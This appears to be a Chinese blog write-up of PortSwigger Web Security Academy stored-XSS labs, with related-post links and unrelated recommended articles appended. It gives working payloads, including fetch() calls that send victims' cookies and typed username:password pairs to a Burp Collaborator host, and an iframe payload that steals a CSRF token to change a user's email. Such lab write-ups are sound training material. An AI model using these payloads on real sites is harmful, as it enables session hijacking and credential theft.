Portswigger web security academy:Stored XSS

Stored XSS into HTML context with nothing encoded

  • 题目要求

    提交评论,调用alert函数

  • 解题过程

    直接祖传payload就行

Stored XSS into anchor href attribute with double quotes HTML-encoded

  • 题目描述

    评论功能点有存储型xss

    要求当author name被点击的时候调用alert函数

  • 解题过程

    <p>
    
	<img src="/resources/images/avatarDefault.svg" class="avatar">                     <a id="author" href="https://test.test">name</a> | 24 May 2020
    
</p>

    随便输个链接测试一下,发现输入的website被直接嵌入到了href

    构造payload:javascript:alert()

Stored DOM XSS

  • 题目描述

    评论功能点有存储型dom-xss,调用alert函数即可

  • 解题过程

    关键代码

    function escapeHTML(html) {
    
        return html.replace('<', '&lt;').replace('>', '&gt;');
    
}
    
let newInnerHtml = firstPElement.innerHTML + escapeHTML(comment.author)

    注意这里的escapeHTML函数的定义,使用了replace函数,js的replace函数有个特性,只会替换最开始出现的一个字符,所以

    构造payload:<><img src=x onerror=alert()>

Stored XSS into onclick event with angle brackets and double quotes HTML-encoded and single quotes and backslash escaped

  • 题目描述

    评论功能点有存储型xss

    要求当author name被点击的时候调用alert函数

  • 解题过程

    这是上上道题的升级版,<>"会被HTML编码,'\会被addslash

    关键代码

    <a id="author" href="https://aaaaa\'&quot;`\\" onclick="var tracker={track(){}};tracker.track('https://aaaaa\'&quot;`\\');">asd</a>

    可以看到website直接被嵌入到了hrefonclick,因为后端检测了url格式,所以href无法进行xss

    onclick,考虑如何闭合引号,注意到这里是html+js环境,所以可以使用HTML实体编码/unicode编码,但是\会被addslash,所以只能用HTML实体编码

    构造payload:http://xss'-alert()-'

    这里涉及到一个js的知识点,eval('xss'-alert()会弹窗,即js语境中,字符串与语句进行运算,会执行语句

Exploiting cross-site scripting to steal cookies

  • 题目描述

    博客评论点有存储型xss

    要求盗取cookie并模拟被盗者身份

  • 解题步骤

    这道题要用到Burp Collaborator,这是一个burp自带的测试工具,贴一篇介绍

    简单来说就是一个用来接收并返回数据的接口,类似于自己搭的vps接收cookie

    构造payload:

    <script>
    
fetch('https://xxxxxx.burpcollaborator.net',{
    
method:'post',
    
body:document.cookie
    
});
    
</script>

    放到评论区,然后在Burp Collaborator Clientpoll一下拿到cookie,再替换掉自己的cookie就可以

Exploiting cross-site scripting to capture passwords

  • 题目描述

    在博客评论点有存储型xss

    要求盗取usernamepassword并登录

  • 解题过程

    这道题参考了官方的solution,没有过盗取usernamepassword的思路

    <input name=username id=username>
    
<input type=password name=password onchange="if(this.value.length)fetch('https://4glwxnk77bznm13y44j75a137udl1a.burpcollaborator.net',{
    
method:'POST',
    
mode: 'no-cors',
    
body:username.value+':'+this.value
    
});">

    payload利用了usernamepassword接口,在用户访问页面时自动填写,这里有点脑洞题的感觉,因为这里的赋值是需要后台进行渲染,或者通过get传值的。

    但payload思路可以借鉴

Exploiting XSS to perform CSRF

  • 题目描述

    在评论点有存储型xss

    要求修改查看评论的用户的邮件地址

  • 解题过程

    先登录给的账号,修改email,用burp看下数据包

    关键部分

    POST /email/change-email HTTP/1.1
    
Host: accf1faa1fa54c128098504e00910043.web-security-academy.net
    
Connection: close
    
Content-Length: 58
    
Origin: https://accf1faa1fa54c128098504e00910043.web-security-academy.net
    
Accept-Encoding: gzip, deflate
    
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
    
Cookie: session=hVm5TBng8eVK17OV1ulcF6IP5xbwzcu4

email=aaaa%40bbb.ccc&csrf=aIMl9DOIMdHZQ4qsl05r4dERRyrRzFm6

    这里需要一个csrf token,所以要用到iframe

    构造payload:(可行)

    <iframe src='https://accf1faa1fa54c128098504e00910043.web-security-academy.net/email' name='xxx'  onload="
    
var csrf = window.frames['xxx'].document.getElementsByName('csrf')[0].value;
    
fetch('https://accf1faa1fa54c128098504e00910043.web-security-academy.net/email/change-email',{
    
method:'post',
    
body:'email=aaa@bbb.ccc&csrf='+csrf
    
});">
    
</iframe>

Portswigger web security academy:Stored XSS的更多相关文章

  1. Portswigger web security academy:Reflected XSS

    Portswigger web security academy:Reflected XSS 目录 Portswigger web security academy:Reflected XSS Ref ...

  2. Portswigger web security academy:DOM Based XSS

    Portswigger web security academy:DOM Based XSS 目录 Portswigger web security academy:DOM Based XSS DOM ...

  3. Portswigger web security academy:WebSockets

    Portswigger web security academy:WebSockets 目录 Portswigger web security academy:WebSockets Lab: Mani ...

  4. Portswigger web security academy:Clickjacking (UI redressing)

    Portswigger web security academy:Clickjacking (UI redressing) 目录 Portswigger web security academy:Cl ...

  5. Portswigger web security academy:Cross-origin resource sharing (CORS)

    Portswigger web security academy:Cross-origin resource sharing (CORS) 目录 Portswigger web security ac ...

  6. Portswigger web security academy:XML external entity (XXE) injection

    Portswigger web security academy:XML external entity (XXE) injection 目录 Portswigger web security aca ...

  7. Portswigger web security academy:Cross-site request forgery (CSRF)

    Portswigger web security academy:Cross-site request forgery (CSRF) 目录 Portswigger web security acade ...

  8. Portswigger web security academy:OAth authentication vulnerable

    Portswigger web security academy:OAth authentication vulnerable 目录 Portswigger web security academy: ...

  9. Portswigger web security academy:Server-side request forgery (SSRF)

    Portswigger web security academy:Server-side request forgery (SSRF) 目录 Portswigger web security acad ...

随机推荐

  1. 优秀的vue服务端渲染框架

    目前国内优秀的基于vue的ssr框架有minissr,可以在服务端生成html代码,有利于搜索引擎爬取. https://www.wechatmini.com/vue/minissr 使用方法可以参考 ...

  2. FreeBSD 12.2 阿里云镜像使用说明

    目前直接从阿里云 12.1 升级 12.2 会导致错误.镜像非本人制作.FreeBSD 12.2 阿里云镜像使用说明镜像下载地址: http://t.cn/A6taB5jO修改内容:对 /usr/sr ...

  3. Python之内存泄漏和内存溢出

    预习知识:python之MRO和垃圾回收机制 一.内存泄漏 像Java程序一样,虽然Python本身也有垃圾回收的功能,但是同样也会产生内存泄漏的问题.对于一个用 python 实现的,长期运行的后台 ...

  4. 让 Java 中 if else 更优雅的几个小技巧

    对于一个高级 crud 工程师‍而言,if else 是写代码时使用频率最高的关键词之一,然而有时过多的 if else 会让我们优雅的 crud 代码显得不那么优雅,并且感到脑壳疼

  5. Spring源码之ApplicationContext

    ​ 本文是针对Srping的ClassPathXMLApplicationContext来进行源码解析,在本篇博客中将不会讲述spring Xml解析注册代码,因为ApplicationContext ...

  6. Airtest简单上手讲解

    Airtest是网易开发的手机UI界面自动化测试工具,它原本的目的是通过所见即所得,截图点击等等功能,简化手机App图形界面测试代码编写工作. 安装和使用 由于本文的目的是介绍如何使用Airtest来 ...

  7. Benjio0-Curriculum Learning 2009

    Curriculum Learning 2009 核心思想: 相比于随机选取训练样本对模型进行训练,使用由易到难的样本(更加复杂,包含更多信息)训练模型可以取得更好的训练效果. 由于这种训练模式类似于 ...

  8. Java例题_38 自定义函数求字符串长度

    1 /*38 [程序 38 求字符串长度] 2 题目:写一个函数,求一个字符串的长度,在 main 函数中输入字符串,并输出其长度. 3 */ 4 5 /*分析 6 * 1.从键盘得到一个字符串 7 ...

  9. DAOS 分布式异步对象存储|安全模型

    DAOS 使用了一个灵活的安全模型,将身份验证和授权分离开来.它的设计令其对 I/O 的影响被降到最小. DAOS 对用于 I/O 传输的网络结构没有提供任何传输安全性保障.在部署 DAOS 时,管理 ...

  10. Python面向对象练习题

    1.模拟栈操作原理 先进后出 ​1.初始化(创建一个存储数据的列表) 2.进栈使用列表保存数据 ​ 3.出栈 使用列表删除数据 ​ 4.查看栈顶元素 切片获取列表最后一位数据 ​5.判断是否为空栈 6 ...